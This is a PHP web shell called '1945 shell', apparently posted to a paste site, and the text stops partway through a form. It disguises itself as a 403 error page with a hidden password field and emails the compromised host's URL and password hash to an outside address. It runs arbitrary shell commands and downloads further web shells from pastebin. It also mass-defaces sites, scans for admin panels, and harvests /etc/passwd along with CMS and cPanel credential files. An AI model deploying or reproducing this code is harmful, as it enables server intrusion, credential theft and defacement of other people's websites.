· 10 years ago · Jun 18, 2016, 04:33 PM
1<?php
2// 1945 shell
3// c0ded by : shutdown57
4error_reporting(0);
5set_time_limit(0);
6session_start();
7
8$s57_paswot = "2d00f43f07911355d4151f13925ff292";//default password : 1945
9
10$alert="<script>
11window.location.href='?45=".$_GET['act']."';
12</script>";
13@define('judul', '1945');
14
15
16function shutdown57_login() {
17echo"
18<title> Forbidden</title>
19</head><body>
20<h1>Forbidden</h1>
21
22<p>You don't have permission to access ".$_SERVER['REQUEST_URI']." on this server.<br>
23Server unable to read htaccess file, denying access to be safe
24<br><br>
25Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.</p>";
26
27if($_GET['login']=='1945'){
28
29 echo'
30<center>
31
32<form method="post">
33<input type="password" name="pass" style="border:0;position:fixed;bottom:0;right:0;color:#f00">
34 </center>
35 ';
36}
37 exit;
38}
39
40
41if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
42 if( empty( $s57_paswot ) ||
43 ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $s57_paswot) ) )
44 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
45 else
46 shutdown57_login();
47 $folder='<img src="data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA'.'AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp'.'/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=">';
48 $files='<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=">';
49 @mail('woslinuxers57799@gmail.com','[setor shell 1945]','URL : '.$_SERVER['HTTP_HOST'].'/'.$_SERVER['REQUEST_URI'].' PASSWORD@byPass : '.$s57_paswot.'@'.$bypass.' ','admin@google.com');
50
51?>
52<!DOCTYPE html>
53<html>
54<head>
55 <title>..:['<?php echo judul; ?>']:..</title>
56 <link rel="shortcut icon" type="text/css" href="http://www.animatedimages.org/data/media/781/animated-indonesia-flag-image-0013.gif">
57</head>
58<body>
59<style type="text/css">
60body{background: #000;color: #f00;font-family:arial;}
61a{color:#eee;text-decoration: none;}
62a:hover{color:#f00;border-bottom: 1px solid #fff;}
63input[type='text'],input[type='submit'],option,select{color: #f00;border:1px solid #eee;background: #000;}
64textarea{width:80%;height: 500px;background: #000;color: #f00;border:1px solid #eee;}
65textarea:hover,input[type='text']:hover,input[type='submit']:hover,option:hover,select:hover{border:1px solid #f00;color: #eee;}
66table{border-collapse: collapse;}
67.tbl_exp{width: 100%;border-collapse: collapse;border:0;font-size: 14px;margin-bottom: 100px;}
68.hover:hover{background: #333;}
69.hover{border-bottom: 1px solid grey;}
70.header #right{text-align:right;float: right;}
71.header #left{text-align: left;float: left;}
72#viewimg{margin-top:150px;text-align: center;}
73#thead{background: #f00;color: #fff;}
74.code{border: 1px solid #fff;width: 80%;text-align: left;font-size: 13px;}
75.header{width: 100%;}
76</style>
77
78<table class="header">
79<tr><td>
80<?php
81(curl_init()) ? $curl="<font color=lime>ON </font>" : $curl="<font color=grey>OFF </font>";
82(ini_get('safemode')) ? $sm="<font color=lime>ON </font>" : $sm="<font color=grey>OFF </font>";
83(ini_get('allow_url_fopen')) ? $url_fp="<font color=lime>ON </font>" : $url_fp="<font color=grey>OFF </font>";
84(function_exists('mysql_connect')) ? $mysql="<font color='lime'>ON </font>" : $mysql="<font color='grey'>OFF </font>";
85
86if(!function_exists('posix_getegid')) {
87 $user = @get_current_user();
88 $uid = @getmyuid();
89 $gid = @getmygid();
90 $group = "?";
91} else {
92 $uid = @posix_getpwuid(posix_geteuid());
93 $gid = @posix_getgrgid(posix_getegid());
94 $user = $uid['name'];
95 $uid = $uid['uid'];
96 $group = $gid['name'];
97 $gid = $gid['gid'];
98}
99echo "
100<div id='left'>
101<pre style='font-size:13px;'>
102SERVER SOFTWARE : ".$_SERVER['SERVER_SOFTWARE']."
103UNAME : ".php_uname()."
104HOSTNAME : ".$_SERVER['HTTP_HOST']."
105IP SERVER : ".gethostbyname($_SERVER['HTTP_HOST'])." | YOUR IP : ".$_SERVER['REMOTE_ADDR']."
106User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")
107PHP version : ".phpversion()."-[<a href='?act=".getcwd()."&phpinfo=busuK_tampilanNya_kembali_aja'>PHPINFO</a>]
108CURL:".$curl."|safemode:".$sm."|URL FOPEN:".$url_fp."|MySQL:".$mysql."
109DISABLE FUNCTIONS :".ini_get('disable_functions')."
110current dir :";
111if(isset($_GET['45'])){
112 $d=$_GET['45'];
113}else{
114 if(isset($_GET['act'])){
115$d=$_GET['act'];
116}else{
117$d=getcwd();
118
119}
120}
121$d=str_replace('\\','/',$d);
122$path = explode('/',$d);
123
124foreach($path as $id=>$curdir){
125if($curdir == '' && $id == 0){
126$a = true;
127echo '<a href="?45=/">/</a>';
128continue;
129}
130if($curdir == '') continue;
131echo '<a href="?45=';
132for($i=0;$i<=$id;$i++){
133echo "$path[$i]";
134if($i != $id) echo "/";
135}
136echo '">'.$curdir.'</a>/';
137}
138$pwd=str_replace('\\','/',getcwd());
139(is_writable($d))?$stat="<font color=lime>WRITABLE</font>" :$stat="<font color=grey>NOT WRITABLE</font>";
140
141?>
142~[<?php echo $stat;?>][<a href="?45=<?php echo $pwd; ?>">home</a>][<a href="javascript:history.go(-1);">back</a>]
143</div>
144</td><td>
145<div id='right'>
146<center>
147[<a href="?act=<?php echo $d;?>&about=<?php echo $d;?>">--[ 1945 SHELL ]--</a>]-[<a href="?act=logout">[logOut]</a>]
148</center>
149<br>
150[<a href="?act=<?php echo $d;?>&newfile=<?php echo $d;?>">Newfile</a>]
151[<a href="?act=<?php echo $d;?>&mkdir=<?php echo $d;?>">NewDir</a>]
152[<a href="?act=<?php echo $d;?>&shell=<?php echo $d;?>">Shell</a>]
153[<a href="?act=<?php echo $d;?>&conf=<?php echo $d;?>">config grab</a>]
154[<a href="?act=<?php echo $d;?>&admfind=<?php echo $d;?>">Admin finder</a>]
155<br>
156[<a href="?act=<?php echo $d;?>&upload=<?php echo $d;?>">Upload</a>]
157[<a href="?act=<?php echo $d;?>&unzip=<?php echo $d;?>">Unzip file</a>]
158[<a href="?act=<?php echo $d;?>&stringtools=<?php echo $d;?>">String Tools</a>]
159[<a href="?act=<?php echo $d;?>&kuchiyose=<?php echo $d;?>">Kuchiyose no jutsu</a>]
160[<a href="?act=<?php echo $d;?>©=<?php echo $d;?>">Copy</a>]
161<br>
162[<a href="?act=<?php echo $d;?>&ctools=<?php echo $d;?>">Create tools</a>]
163[<a href="?act=<?php echo $d;?>&mail=<?php echo $d;?>">Mail sender</a>]
164[<a href="?act=<?php echo $d;?>&massdeface=<?php echo $d;?>">Mass deface</a>]
165[<a href="?act=<?php echo $d;?>&zoneh=<?php echo $d;?>">Zone-H</a>]
166[<a href="?act=<?php echo $d;?>&cpbrute=<?php echo $d;?>">cPanel bruteforce</a>]
167<br><br>
168<form method="get">
169Go to dir:<input type="text" name="45" value="<?php echo $d;?>" style="width:250px">
170<input type="submit" value=">>">
171</form>
172</div>
173</td></tr></table>
174<?php
175
176if(isset($_GET['act'])){
177 //Kuchiyose tools
178$k=array(
179 'adminer'=>"https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php",
180 'wso'=>"http://pastebin.com/raw/N0eh3Q7Y",
181 'whmcs'=>"http://pastebin.com/raw/TjiXt4r1",
182 'bejak'=>"http://pastebin.com/raw/sQJVES6y",
183 );
184function kuchiyose($url, $isi) {
185 $fp = fopen($isi, "w");
186 $ch = curl_init();
187 curl_setopt($ch, CURLOPT_URL, $url);
188 curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
189 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
190 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
191 curl_setopt($ch, CURLOPT_FILE, $fp);
192 return curl_exec($ch);
193 curl_close($ch);
194 fclose($fp);
195 ob_flush();
196 flush();
197 }
198 if($_GET['kuchiyose']=='adminer'){
199if(file_exists('1945_adminer.php')){
200 echo" done!! => <a href='1945_adminer.php' target='_blank'>click here</a>";
201 }else{
202 if(kuchiyose($k['adminer'],'1945_adminer.php')){
203 echo"done!! --> <a href='1945_adminer.php' target='_blank'>click here..</a>";
204 }else{
205 echo" failed!! check your connection!";
206 }
207 }
208}elseif ($_GET['kuchiyose']=='wso') {
209 if(file_exists('1945_wso.php')){
210 echo" done!! => <a href='1945_wso.php' target='_blank'>click here</a>";
211 }else{
212 if(kuchiyose($k['wso'],'1945_wso.php')){
213 echo"done!! --> <a href='1945_wso.php' target='_blank'>click here..</a>";
214 }else{
215 echo" failed!! check your connection!";
216 }
217 }
218}elseif ($_GET['kuchiyose']=='whmcs') {
219 if(file_exists('1945_whmcs.php')){
220 echo" done!! => <a href='1945_whmcs.php' target='_blank'>click here</a>";
221 }else{
222 if(kuchiyose($k['whmcs'],'1945_whmcs.php')){
223 echo"done!! --> <a href='1945_whmcs.php' target='_blank'>click here..</a>";
224 }else{
225 echo" failed!! check your connection!";
226 }
227 }
228}elseif ($_GET['kuchiyose']=='bejak') {
229if(file_exists('1945_b374k.php')){
230 echo" done!! => <a href='1945_b374k.php' target='_blank'>click here</a>";
231 }else{
232 if(kuchiyose($k['bejak'],'1945_b374k.php')){
233 echo"done!! --> <a href='1945_b374k.php' target='_blank'>click here..</a>";
234 }else{
235 echo" failed!! check your connection!";
236 }
237 }
238}elseif ($_GET['kuchiyose']=='bypass_shell') {
239 $isi="Addhandler application/x-httpd-php .jpg";
240
241 $fp=fopen('.htaccess','a+');
242 if(fwrite($fp,$isi)){
243 if(rename($_SERVER['SCRIPT_FILENAME'],"1945.jpg")){
244 echo"
245 <script>
246 alert('berhasil kakak!!');
247 window.location.href='1945.jpg'
248 </script>";
249 }
250 }
251 fclose($fp);
252}
253elseif(isset($_GET['rmdir'])){
254 function hapussemua($rmdir){
255
256 $s=scandir($rmdir);
257 foreach ($s as $sd) {
258 if(is_file($rmdir."/".$sd)){
259 if(unlink($rmdir."/".$sd)){
260 @rmdir($rmdir);
261 }
262 }else{
263 if(is_dir($rmdir."/".$sd)){
264 if(!rmdir($rmdir."/".$sd)){
265 $s2=scandir($sd);
266 foreach ($s2 as $sd2) {
267 if(is_file($sd."/".$sd2)){
268 if(unlink($sd."/".$sd2)){
269 @rmdir($sd);
270 }
271 }else{
272 if(is_dir($sd."/".$sd2)){
273 @rmdir($sd."/".$sd2);
274@rmdir($sd2);
275 }
276 }
277 }
278
279 }}}}
280}
281if(hapussemua($_GET['rmdir'])){
282echo $alert;
283}
284
285}elseif(isset($_GET['rm'])){
286 $rm=$_GET['rm'];
287 if(unlink($rm)){
288 echo $alert;
289 }
290}elseif(isset($_GET['rename'])){
291 echo"
292 <br><br><br><br>
293 <center>
294 <form method='post' >
295 <p>Old name : ".basename($_GET['rename'])."</p>
296 NewName :
297 <input type='text' name='newname' value='".$_GET['rename']."'><input type='submit' value='>>'>
298 </form>";
299 if(isset($_POST['newname'])){
300 $oldname=$_GET['rename'];
301 $newname=$_POST['newname'];
302 if(rename($oldname,$newname)){
303 echo $alert;
304 }
305 }
306}elseif (isset($_GET['edit'])) {
307 echo"
308 <center>
309 <form method='post' >
310 <textarea name='edit'>".htmlspecialchars(file_get_contents($_GET['edit']))."</textarea>
311 <br>
312 <input type='text' name='editdir' value='".$_GET['edit']."' style='width:350px'><input type='submit' name='editsave' value='save' >
313 </form>";
314 if(isset($_POST['editsave'])){
315 $fp=fopen($_POST['editdir'],'w');
316 if(fwrite($fp,$_POST['edit'])){
317 echo"<br> saved@".date('D M Y');
318 }
319 fclose($fp);
320 }
321}elseif (isset($_GET['chmod'])) {
322 echo"<center>
323 <h3>: change permission files :</h3>
324 <form method='post' >
325 Permission :
326 <input type='text' name='perms' value='".fileperms($_GET['chmod'])."'><input type='submit' value='>>'>
327 </form>";
328 if(isset($_POST['perms'])){
329 if(chmod($_GET['chmod'],$_POST['perms'])){
330 echo'Permission changed! <a href="javascript:history.go(-1)">back</a>';
331 }
332 }
333}elseif (isset($_GET['src'])) {
334
335echo'
336<table>
337<tr><td>[<a href="?act='.$_GET['act'].'&edit='.$_GET['src'].'">edit</a>]</td><td>
338[<a href="?act='.$_GET['act'].'&rm='.$_GET['src'].'">delete</a>]</td><td>
339[<a href="?act='.$_GET['act'].'&rename='.$_GET['src'].'">rename</a>]</td><td>
340[<a href="?act='.$_GET['act'].'&chmod='.$_GET['src'].'">chmod</a>]</td><td>
341[<a href="?act='.$_GET['act'].'&download='.$_GET['src'].'">download</a>]</td></tr></table>
342<center>
343<h3>: View file :</h3>
344<p>Current file: <font color=white>'.$_GET['src'].'</font></p>
345';
346 $src=$_GET['src'];
347 $get_basename=basename($src);
348 $a=preg_match('/.jpg/',$get_basename);
349 $b=preg_match('/.png/',$get_basename);
350 $c=preg_match('/.gif/',$get_basename);
351 $cwd=str_replace('\\','/',getcwd());
352 $plc=str_replace($cwd,'',$src);
353
354 if($c||$b||$a){
355 echo"
356 <br>
357 <center>
358 <img src='".$plc."' id='viewimg' />";
359 }else{
360 $f=$_GET['src'];
361 $file = wordwrap(file_get_contents($f),160,"\n",true);
362 $a= highlight_string($file,true);
363 $old = array("0000BB","000000","FF8000","DD0000", "007700");
364 $new = array("81FF00","e1e1e1", "333333", "ffffff" , "FF8000");
365 $a= str_ireplace($old,$new, $a);
366 $result = $a;
367
368 echo'
369
370 <pre class="code">'.$result.'</pre>';
371}
372}elseif (isset($_GET['upload'])) {
373 if(isset($_POST['upfile'])){
374 $files = array(
375 '1' => $_FILES['files']['name'],
376 '2' => $_FILES['files2']['name'],
377 '3' => $_FILES['files3']['name'],
378 '4' => $_FILES['files4']['name'],
379 '5' => $_FILES['files5']['name']
380 );
381 $tmp= array(
382 '1' => $_FILES['files']['tmp_name'],
383 '2' => $_FILES['files2']['tmp_name'],
384 '3' => $_FILES['files3']['tmp_name'],
385 '4' => $_FILES['files4']['tmp_name'],
386 '5' => $_FILES['files5']['tmp_name']
387 );
388 $dir=array(
389 '1' => $_POST['dir']."/",
390 '2' => $_POST['dir2']."/",
391 '3' => $_POST['dir3']."/",
392 '4' => $_POST['dir4']."/",
393 '5' => $_POST['dir5']."/"
394 );
395 if(move_uploaded_file($tmp['1'],$dir['1'].$files['1'])){
396echo"<br>uploaded -->".$dir['1'].$files['1'];
397 }
398 if(move_uploaded_file($tmp['2'],$dir['2'].$files['2'])) {
399 echo"<br> uploaded --> ".$dir['2'].$files['2'];
400 }
401 if(move_uploaded_file($tmp['3'],$dir['3'].$files['3'])){
402 echo"<br>uploaded --> ".$dir['3'].$files['3'];
403 }
404 if(move_uploaded_file($tmp['4'],$dir['4'].$files['4'])){
405 echo"<br>uploaded --> ".$dir['4'].$files['5'];
406 }
407 if(move_uploaded_file($tmp['5'],$dir['5'].$files['5'])){
408 echo"<br>uploaded --> ".$dir['5'].$files['5'];
409 }
410
411 echo"<br>
412 <font color=white>Success... berhasil dengan tamvanz :)</font>";
413}
414if(is_writable($_GET['upload'])){
415 $stat='<font color="lime">Writable(bisa)</font>';
416}else{
417 $stat='<font color="grey">Not Writable(gak bisa)</font>';
418}
419 ?>
420 <center>
421 <h3>: MultiUpload Files :</h3>
422 <p> status upload file : <?php echo $stat;?></p>
423 <font color=white>NB : kosongkan jika tidak perlu </font>
424 <table border=1><tr><td>file</td><td>Target Dir</td></tr>
425 <tr><td>
426 <form method="Post" enctype="multipart/form-data">
427 <input type="file" name="files" ></td><td>
428 <input type="text" name="dir" value="<?php echo $_GET['upload']; ?>" >
429 </td></tr><tr><td>
430 <input type="file" name="files2" ></td><td>
431 <input type="text" name="dir2" value="<?php echo $_GET['upload']; ?>" >
432 </td></tr><tr><td>
433 <input type="file" name="files3" ></td><td>
434 <input type="text" name="dir3" value="<?php echo $_GET['upload']; ?>" >
435 </td></tr><tr><td>
436 <input type="file" name="files4" ></td><td>
437 <input type="text" name="dir4" value="<?php echo $_GET['upload']; ?>" >
438 </td></tr><tr><td>
439 <input type="file" name="files5"></td><td>
440 <input type="text" name="dir5" value="<?php echo $_GET['upload']; ?>">
441</td></tr></table>
442<br>
443 <input type="submit" name="upfile" class="btn btn-primary" value="upload all">
444
445 </form>
446 </center>
447 <?php
448}elseif (isset($_GET['mkdir'])) {
449 echo'
450 <center>
451<h3>: New Directory :</h3>
452 <form method="post">
453 newdir:<input type="text" name="mkdir" value="'.$_GET['mkdir'].'/newdir" style="width:200px;">
454 <input type="submit" value=">>">
455 </form>';
456 if(isset($_POST['mkdir'])){
457 if(mkdir($_POST['mkdir'])){
458 echo $alert;
459 }
460 }
461}elseif (isset($_GET['newfile'])) {
462echo'
463 <center>
464<h3>: Newfile :</h3>
465 <form method="post">
466 <textarea name="newfile"> </textarea>
467 <br>
468 save :<input type="text" name="saveas" value="'.$_GET['newfile'].'/new.php" style="width:60%">
469 <input type="submit" value=">>" name="subfile">
470 </form><br><br><br>';
471 if(isset($_POST['subfile'])){
472 $fp=fopen($_POST['saveas'],'w');
473 if(fwrite($fp,$_POST['newfile'])){
474 echo $alert;
475 }
476 fclose($fp);
477 }
478}elseif (isset($_GET['shell'])) {
479 echo'
480 <center>
481<fieldset style="border-collapse:collapse;height:500px;">
482<legend>Terminal</legend>
483 <form method="post">
484 <div style="float:left;text-align:left">
485 '.$user.'@<font color=white>'.$_SERVER['HTTP_HOST'].'</font><font color=lime> '.$_GET['shell'].'</font> #:<input type="text" name="command" style="border:0;width:400px;max-width:relative;">
486 </div>
487 </form>';
488 if(isset($_POST['command'])){
489 if(function_exists('shell_exec')){
490 $cmd=shell_exec($_POST['command']);
491 }else{
492 if(function_exists('exec')){
493 $cmd=exec($_POST['command']);
494 }else{
495 if(function_exists('system'));
496 $cmd=system($_POST['command']);
497 }
498 }
499 echo'
500 <br>
501
502 <textarea style="color:lime;text-align:left;width:100%;height:90%;border:0;resize:none;" readonly>
503 '.$cmd.'</textarea></fieldset>';
504 }
505}elseif (isset($_GET['admfind'])) {
506?>
507<center>
508<h3>: admin finder :</h3>
509<form method="POST" action="">
510site :
511<input type="text" name="url" style="width:260px" value="http://"/>
512
513<input type="submit" name="submit" value="find[!]" />
514</p>
515<br>
516<br>
517
518<?php
519
520function xss_protect($data, $strip_tags = false, $allowed_tags = "") {
521 if($strip_tags) {
522 $data = strip_tags($data, $allowed_tags . "<b>");
523 }
524
525 if(stripos($data, "script") !== false) {
526 $result = str_replace("script","scr<b></b>ipt", htmlentities($data, ENT_QUOTES));
527 } else {
528 $result = htmlentities($data, ENT_QUOTES);
529 }
530
531 return $result;
532}
533function urlExist($url)
534{
535 $handle = curl_init($url);
536 if (false === $handle)
537 {
538 return false;
539 }
540 curl_setopt($handle, CURLOPT_HEADER, false);
541 curl_setopt($handle, CURLOPT_FAILONERROR, true);
542 curl_setopt($handle, CURLOPT_HTTPHEADER, Array("User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15") ); // request as if Firefox
543 curl_setopt($handle, CURLOPT_NOBODY, true);
544 curl_setopt($handle, CURLOPT_RETURNTRANSFER, false);
545 $connectable = curl_exec($handle);
546 curl_close($handle);
547 return $connectable;
548}
549 if(isset($_POST['submit']) && isset($_POST['url']))
550 {
551 $url= htmlentities(xss_protect($_POST['url']));
552 if(filter_var($url, FILTER_VALIDATE_URL))
553 {
554 $trying = array(':2082',':2083','a_admins/','admin/','adminweb/','po-admin','index.php?q=admin','administrator/','admin/admin.php','cpanel','admin3/','admin4/','admin5/','usuarios/',
555 'usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/',
556 'panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php',
557 'admin/index.php','admin/login.php','admin/admin.php','admin/account.php','admin_area/admin.php',
558 'admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html',
559 'admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php',
560 'bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admin.php',
561 'admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
562 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html',
563 'panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php',
564 'nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php',
565 'administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
566 'bb-admin/index.html','bb-admin/login.html','acceso.php','bb-admin/admin.html','admin/home.html',
567 'login.php','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php',
568 'pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
569 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php',
570 'adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php',
571 'admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
572 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html',
573 'login.html','modelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html',
574 'panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html',
575 'adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
576 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php',
577 'adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php',
578 'panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php',
579 'adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','usuarios/login.php',
580 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php','admin.asp','admin/admin.asp',
581 'admin_area/admin.asp','admin_area/login.asp','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp',
582 'bb-admin/admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','user.asp','webadmin/index.asp',
583 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp',
584 'adminLogin.asp','admin/adminLogin.asp','home.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp',
585 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp',
586 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
587 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp');
588 foreach($trying as $sec)
589 {
590 $urll=$url.'/'.$sec;
591 if(urlExist($urll))
592 {
593 echo '<p align="center"><font color="00FF00">[+] FOUND!! --> <a href="'.$urll.'" target="_blank">'.$urll.'</a></font></p>';
594 exit;
595 }
596 else
597 {
598 echo '<p align="center"><font color="#eee">[-] NOT FOUND --> '.$urll.'</font></p>';
599 }
600 }
601 echo 'Could not find admin page.[!]';
602 }
603 else
604 {
605 echo '<p>Invalid URL entered.[!]</p>';
606 }
607 }
608
609}elseif (isset($_GET['massdeface'])) {
610 echo'<center>
611 <h3> : Mass deface :</h3>';
612 function sabun_massal($dir,$namafile,$isi_script) {
613 if(is_writable($dir)) {
614 $dira = scandir($dir);
615 foreach($dira as $dirb) {
616 $dirc = "$dir/$dirb";
617 $lokasi = $dirc.'/'.$namafile;
618 if($dirb === '.') {
619 file_put_contents($lokasi, $isi_script);
620 } elseif($dirb === '..') {
621 file_put_contents($lokasi, $isi_script);
622 } else {
623 if(is_dir($dirc)) {
624 if(is_writable($dirc)) {
625 echo "[<font color=lime>OK</font>] $lokasi<br>";
626 file_put_contents($lokasi, $isi_script);
627 $idx = sabun_massal($dirc,$namafile,$isi_script);
628 }
629 }
630 }
631 }
632 }
633 }
634 if($_POST['start']) {
635 echo "<div style='margin: 5px auto; padding: 5px'>";
636 sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
637 echo "</div>";
638 } else {
639 echo "<center>";
640 echo "<form method='post'>
641 <font style='text-decoration: underline;'>Folder:</font><br>
642 <input type='text' name='d_dir' value='".$_GET['massdeface']."' style='width: 450px;' height='10'><br>
643 <font style='text-decoration: underline;'>Filename:</font><br>
644 <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
645 <font style='text-decoration: underline;'>Index File:</font><br>
646 <textarea name='script' style='width:600px; height:400px;'>hacked By WithOutShadow</textarea><br>
647 <input type='submit' name='start' value='Deface'>
648 </form></center>";
649 }
650
651}elseif (isset($_GET['conf'])) {
652 //reference by indoXploit
653
654error_reporting(0);
655$etc = fopen("/etc/passwd/", "r");
656 @mkdir("1945", 0777);
657 $isi_htc = "Options all\nRequire None\nSatisfy Any";
658 $htc = fopen("1945/.htaccess","w");
659 fwrite($htc, $isi_htc);
660 while($passwd = fgets($etc)) {
661 if($passwd == "" || !$etc) {
662 echo "<font color=grey>Can't read /etc/passwd</font>";
663 } else {
664 preg_match_all('/(.*?):x:/', $passwd, $user_config);
665 foreach($user_config[1] as $user) {
666 $user_config_dir = "/home/$user-1945/public_html/";
667 if(is_readable($user_config_dir)) {
668 $grab_config = array(
669 "/home/$user-1945/.my.cnf" => "cpanel",
670 "/home/$user-1945/.accesshash" => "WHM-accesshash",
671 "/home/$user-1945/public_html/bw-configs/config.ini" => "BosWeb",
672 "/home/$user-1945/public_html/config/koneksi.php" => "Lokomedia",
673 "/home/$user-1945/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
674 "/home/$user-1945/public_html/clientarea/configuration.php" => "WHMCS",
675 "/home/$user-1945/public_html/whm/configuration.php" => "WHMCS",
676 "/home/$user-1945/public_html/whmcs/configuration.php" => "WHMCS",
677 "/home/$user-1945/public_html/forum/config.php" => "phpBB",
678 "/home/$user-1945/public_html/sites/default/settings.php" => "Drupal",
679 "/home/$user-1945/public_html/config/settings.inc.php" => "PrestaShop",
680 "/home/$user-1945/public_html/app/etc/local.xml" => "Magento",
681 "/home/$user-1945/public_html/joomla/configuration.php" => "Joomla",
682 "/home/$user-1945/public_html/configuration.php" => "Joomla",
683 "/home/$user-1945/public_html/wp/wp-config.php" => "WordPress",
684 "/home/$user-1945/public_html/wordpress/wp-config.php" => "WordPress",
685 "/home/$user-1945/public_html/wp-config.php" => "WordPress",
686 "/home/$user-1945/public_html/admin/config.php" => "OpenCart",
687 "/home/$user-1945/public_html/slconfig.php" => "Sitelok",
688 "/home/$user-1945/public_html/application/config/database.php" => "Ellislab");
689 foreach($grab_config as $config => $nama_config) {
690 $ambil_config = file_get_contents($config);
691 if($ambil_config == '') {
692 } else {
693 $file_config = fopen("1945/$user-$nama_config.txt","w");
694 fputs($file_config,$ambil_config);
695 }
696 }
697 }
698 }
699 }
700 }
701 echo "<center>done!!! <a href='1945' target='_blank'><font color=lime>click here</font></a></center>";
702}elseif (isset($_GET['ctools'])) {
703 echo'
704<center>
705<h3>: Create Your Tools :</h3>
706<p><font color=white> NB : Tools ini akan mengambil script dari URL format .txt atau dari pastebin</font></p>
707 <form method="post">
708 <table><tr>
709 <th colspan=2>Import from</th>
710 </tr><tr><td>
711 URL : </td><td><input type="text" name="url" placeholder="http://site.com/1.txt" style="width:200px"></td></tr><tr>
712 <td>
713 PASTEBIN :</td><td><input type="text" name="pastebin" placeholder="4hIh93nJ" style="width:200px"></td></tr>
